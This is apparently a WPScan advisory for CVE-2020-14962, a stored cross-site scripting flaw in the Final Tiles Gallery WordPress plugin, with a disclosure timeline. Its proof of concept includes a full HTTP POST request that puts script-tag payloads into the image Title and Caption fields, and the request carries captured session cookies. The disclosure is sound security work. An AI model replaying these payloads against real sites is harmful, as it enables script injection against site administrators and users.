Final Tiles Gallery < 3.4.19 – Authenticated Stored Cross-Site Scripting (XSS) | CVE 2020-14962

Description

Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user (author+) to inject arbitrary javascript code into a post using the gallery which is viewed by admin and other users.

Timeline (WPScanTeam):
May 14th, 2020 - Issue confirmed, Vendor Contacted (via https://www.machothemes.com/contact-us-now/) and given 14 days for a response before escalating to WP plugins team.
May 27th, 2020 - v3.4.19 released, fixing the issue.

Proof of Concept

#XSS TRIGGER POINT: When an admin or authenticated user load contents of gallery or post with Shortcode embed: [FinalTilesGallery id='3']
https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
https://[WP]/2020/05/13/site-review/


Add an image to a gallery from the plugin, then put the payload <script>alert(/XSS/)</script> in the Title and Caption fields.

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Origin: http://example.com
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7

source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0